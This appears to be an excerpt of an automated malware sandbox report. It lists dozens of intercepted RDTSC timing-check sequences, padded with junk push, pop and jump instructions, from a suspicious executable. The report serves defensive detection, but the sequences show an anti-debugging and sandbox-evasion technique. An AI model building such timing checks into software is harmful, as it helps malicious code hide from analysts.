Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA12CD second address: EA12E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8C2504F386h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edi 0x0000000e jmp 00007F8C2504F38Bh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA1429 second address: EA142F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA142F second address: EA1433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA1433 second address: EA1437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA1559 second address: EA155F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA155F second address: EA1563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA22DA second address: EA22DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA22DE second address: EA22E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA22E6 second address: EA232B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F8C2504F395h 0x0000000a jmp 00007F8C2504F38Eh 0x0000000f jnl 00007F8C2504F386h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F8C2504F392h 0x0000001d push eax 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA232B second address: EA232F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA56CC second address: EA56D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53AA second address: EA53B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53B0 second address: EA53B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53B6 second address: EA53DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F8C24FD04D6h 0x0000000b jmp 00007F8C24FD04CAh 0x00000010 jnl 00007F8C24FD04C6h 0x00000016 pop edx 0x00000017 pushad 0x00000018 jng 00007F8C24FD04C8h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53DF second address: EA53E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EA53E3 second address: EA5408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8C24FD04C6h 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAC5D4 second address: EAC5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAB9CA second address: EAB9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8C24FD04C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EABC90 second address: EABC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EABC98 second address: EABCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8C24FD04C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EABCA7 second address: EABCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAED3D second address: EAED64 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F8C24FD04D8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F8C24FD04C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAED64 second address: EAED90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F38Ah 0x00000009 jmp 00007F8C2504F397h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAED90 second address: EAEDAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8C24FD04D0h 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEEF3 second address: EAEEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEEF8 second address: EAEEFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEEFE second address: EAEF02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEF02 second address: EAEF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAEF0C second address: EAEF10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF03D second address: EAF041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF041 second address: EAF05A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F395h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF05A second address: EAF0A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C24FD04D8h 0x00000008 jnc 00007F8C24FD04C6h 0x0000000e jbe 00007F8C24FD04C6h 0x00000014 jc 00007F8C24FD04C6h 0x0000001a popad 0x0000001b push edi 0x0000001c jnl 00007F8C24FD04C6h 0x00000022 jnp 00007F8C24FD04C6h 0x00000028 pop edi 0x00000029 pop edx 0x0000002a pop eax 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF0A0 second address: EAF0B4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C2504F386h 0x00000008 js 00007F8C2504F386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF0B4 second address: EAF0CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F8C24FD04D1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF39A second address: EAF3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF3A1 second address: EAF3B2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF3B2 second address: EAF3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EAF3B7 second address: EAF3C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F8C24FD04C6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB738B second address: EB7391 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB5D4F second address: EB5D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB5D57 second address: EB5D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB5FFF second address: EB6022 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8C24FD04D1h 0x0000000f jne 00007F8C24FD04CEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB6182 second address: EB6187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F8C7 second address: E5F8CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB66FA second address: EB6704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8C2504F386h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB6704 second address: EB672A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8C24FD04C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F8C24FD04D7h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF916 second address: EBF939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F399h 0x00000007 js 00007F8C2504F386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF939 second address: EBF957 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C24FD04C8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 ja 00007F8C24FD04CCh 0x00000018 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF957 second address: EBF965 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C2504F388h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF965 second address: EBF96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF96B second address: EBF96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBD823 second address: EBD83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBD83B second address: EBD845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8C2504F386h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBD845 second address: EBD870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f js 00007F8C24FD04C6h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDA0E second address: EBDA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F38Fh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDA21 second address: EBDA30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F8C24FD04C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDD32 second address: EBDD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDD36 second address: EBDD46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F8C24FD04C6h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDD46 second address: EBDD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8C2504F38Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBE01B second address: EBE021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBE5BD second address: EBE5E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C2504F390h 0x00000010 jmp 00007F8C2504F38Ch 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEEFF second address: EBEF32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F8C24FD04D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jp 00007F8C24FD04C6h 0x00000012 jmp 00007F8C24FD04D2h 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF32 second address: EBEF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF38 second address: EBEF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04CDh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF49 second address: EBEF75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Bh 0x00000007 jmp 00007F8C2504F399h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF75 second address: EBEF8A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C24FD04C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF8A second address: EBEF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2B94 second address: EC2BA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F8C24FD04C6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F8C24FD04C6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2BA8 second address: EC2BE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C2504F38Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F8C2504F393h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jnl 00007F8C2504F386h 0x0000001d push edx 0x0000001e pop edx 0x0000001f je 00007F8C2504F386h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2BE2 second address: EC2BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8C24FD04C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2BED second address: EC2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C2504F386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C2504F395h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2C11 second address: EC2C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2EBF second address: EC2EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2EC7 second address: EC2ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2ECD second address: EC2ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC3624 second address: EC3638 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jg 00007F8C24FD04C6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECFF48 second address: ECFF4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECFF4C second address: ECFF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8C24FD04CCh 0x0000000c jmp 00007F8C24FD04D3h 0x00000011 jmp 00007F8C24FD04D6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE0F5 second address: ECE10B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE252 second address: ECE257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE257 second address: ECE263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C2504F386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE263 second address: ECE26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE679 second address: ECE67D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE7D8 second address: ECE7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE7DE second address: ECE7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
